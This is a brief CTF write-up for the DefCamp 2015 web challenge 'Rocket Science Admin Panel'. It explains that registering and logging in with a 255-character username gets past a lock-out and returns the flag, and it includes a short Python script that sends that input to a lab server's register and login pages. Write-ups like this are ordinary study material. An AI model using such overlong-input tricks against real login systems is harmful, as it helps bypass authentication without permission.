WRITEUP – DEFCAMP2015 – Rocket Science Admin Panel – Web 300

In this challenge we are given a register and a login page. After registration, we want to try to login, but we were automatically blocked. We wrote a python script to register and authenticate automatically. The last step we took, was to send a huge amount of characters to the server. Register an login failes and we get the register and login mask as a response. 1024 characters lead to a successful registration, but we got a “nop” as response by logging into the service. When we sent 255 a’s we got a successful login and the flag was given.

#!/usr/bin/python3

import urllib.request
import urllib.parse

href = 'http://10.13.37.4/'
params = {}

password = ["hey", "you"]

params['username'] = b'a'*255
params['password'] = password
data = urllib.parse.urlencode(params)
data = data.encode('ascii')
req = urllib.request.Request(href+"register.php", data)
print(urllib.request.urlopen(req).read())

params['password'] = password
data = urllib.parse.urlencode(params)
data = data.encode('ascii')
req = urllib.request.Request(href+"login.php", data)
print(urllib.request.urlopen(req).read())